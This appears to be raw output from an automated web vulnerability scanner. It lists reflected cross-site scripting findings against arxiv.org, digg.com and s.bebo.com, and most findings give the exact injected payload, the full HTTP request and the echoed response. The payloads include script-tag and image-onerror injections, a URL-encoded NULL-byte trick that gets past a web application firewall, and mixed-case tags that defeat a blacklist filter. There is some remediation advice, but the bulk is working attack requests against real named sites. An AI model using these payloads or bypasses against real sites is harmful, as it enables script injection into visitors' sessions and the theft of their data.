The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 96bec<script>alert(1)</script>31850fde6f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032.96bec<script>alert(1)</script>31850fde6f7 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:10 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861230402172; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1817
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs.LO/9809032.96bec<script>alert(1)</script>31850fde6f7' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 901ff</title><script>alert(1)</script>733d757fda2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs.LO/9809032.901ff</title><script>alert(1)</script>733d757fda2 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:12 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861232170207; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1841
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs.LO/9809032.901ff</title><script>alert(1)</script>733d757fda2] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3ae2c</title><script>alert(1)</script>18033472b07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs3ae2c</title><script>alert(1)</script>18033472b07/0605124 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:09 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861229158723; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1597
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs3ae2c</title><script>alert(1)</script>18033472b07/0605124] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c79dc<script>alert(1)</script>9b8a1a41a8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/csc79dc<script>alert(1)</script>9b8a1a41a8b/0605124 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:07 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861227679531; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1581
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'csc79dc<script>alert(1)</script>9b8a1a41a8b/0605124' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2feab</title><script>alert(1)</script>58dbd9a9988 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs/06051242feab</title><script>alert(1)</script>58dbd9a9988 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:10 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861230711412; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1829
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs/06051242feab</title><script>alert(1)</script>58dbd9a9988] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d257a</title>0772276941 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <TITLE> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /abs/cs/0605124d257a</title>0772276941 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:22 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861242753578; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1751
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[cs/0605124d257a</title>0772276941] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 691f5<script>alert(1)</script>7fdaff06913 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/cs/0605124691f5<script>alert(1)</script>7fdaff06913 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 22:47:09 GMT Server: Apache Set-Cookie: browser=174.122.23.218.1289861229913989; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1805
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier 'cs/0605124691f5<script>alert(1)</script>7fdaff06913' not recognized</h2> ...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 354e6<script>alert(1)</script>9e4bbe4ab3a was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 2f9a3<script>alert(1)</script>3f2186159c0 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload b2d4b<script>alert(1)</script>7accd93245f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 2592d<script>alert(1)</script>c1e822091b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 659ac<script>alert(1)</script>baaaa234f98 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload af05b<script>alert(1)</script>7e6dbe063e2 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 8d7c4<script>alert(1)</script>ee2ca8de652 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007bcf2"><script>alert(1)</script>8ead5cb9030 was submitted in the REST URL parameter 1. This input was echoed as 7bcf2"><script>alert(1)</script>8ead5cb9030 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%007bcf2"><script>alert(1)</script>8ead5cb9030 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093c78"><ScRiPt>alert(1)</ScRiPt>c19a972995a was submitted in the REST URL parameter 1. This input was echoed as 93c78"><ScRiPt>alert(1)</ScRiPt>c19a972995a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /submit%0093c78"><ScRiPt>alert(1)</ScRiPt>c19a972995a?phase=2&url= HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16d9a'><script>alert(1)</script>ce012ac9138 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site16d9a'><script>alert(1)</script>ce012ac9138/index20_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: it-IT Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:38 GMT Content-Length: 9148 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ea0"><img%20src%3da%20onerror%3dalert(1)>bacbb2e5188 was submitted in the REST URL parameter 2. This input was echoed as c4ea0"><img src=a onerror=alert(1)>bacbb2e5188 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/sitec4ea0"><img%20src%3da%20onerror%3dalert(1)>bacbb2e5188/index20_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:37 GMT Content-Length: 9813 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d29f6'%3baefa9bf4084 was submitted in the REST URL parameter 2. This input was echoed as d29f6';aefa9bf4084 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/sited29f6'%3baefa9bf4084/index20_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: fr-FR Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:38 GMT Content-Length: 9400 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a41db<script>alert(1)</script>d802fa599a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/sitea41db<script>alert(1)</script>d802fa599a1/index20_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: us-US Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:39 GMT Content-Length: 10859 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/sitea41db<script>alert(1)</script>d802fa599a1/index20_script.js page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c22"><img%20src%3da%20onerror%3dalert(1)>1f7725decc3 was submitted in the REST URL parameter 3. This input was echoed as a7c22"><img src=a onerror=alert(1)>1f7725decc3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/a7c22"><img%20src%3da%20onerror%3dalert(1)>1f7725decc3 HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:41 GMT Content-Length: 8706 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 26b8b<img%20src%3da%20onerror%3dalert(1)>99e5b52e6fa was submitted in the REST URL parameter 3. This input was echoed as 26b8b<img src=a onerror=alert(1)>99e5b52e6fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/site/index20_script.js26b8b<img%20src%3da%20onerror%3dalert(1)>99e5b52e6fa HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: us-US Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:44 GMT Content-Length: 10495 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee4b2'><script>alert(1)</script>3faed2ba211 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site/index20_script.jsee4b2'><script>alert(1)</script>3faed2ba211 HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:41 GMT Content-Length: 8799 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 904d7'%3b38ebcb9ff8d was submitted in the REST URL parameter 3. This input was echoed as 904d7';38ebcb9ff8d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/site/index20_script.js904d7'%3b38ebcb9ff8d HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: es-ES Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:41 GMT Content-Length: 8630 Connection: close Cache-Control: no-cache Pragma: No-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 13807<script>alert(1)</script>33e23564059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/site13807<script>alert(1)</script>33e23564059/regframe_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:40 GMT Content-Length: 9166 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: nie mamy strony/c/site13807<script>alert(1)</script>33e23564059/regframe_script.js . Spr..buj ponownie p....niej.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45dd4'%3b64cce22bcae was submitted in the REST URL parameter 2. This input was echoed as 45dd4';64cce22bcae in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/site45dd4'%3b64cce22bcae/regframe_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:39 GMT Content-Length: 8973 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db825'><script>alert(1)</script>6b3de097709 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/sitedb825'><script>alert(1)</script>6b3de097709/regframe_script.js HTTP/1.1 Host: s.bebo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Content-Language: pl-PL Content-Type: text/html; charset=UTF-8 Date: Mon, 15 Nov 2010 22:43:38 GMT Content-Length: 9184 Connection: close Cache-Control: max-age=600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
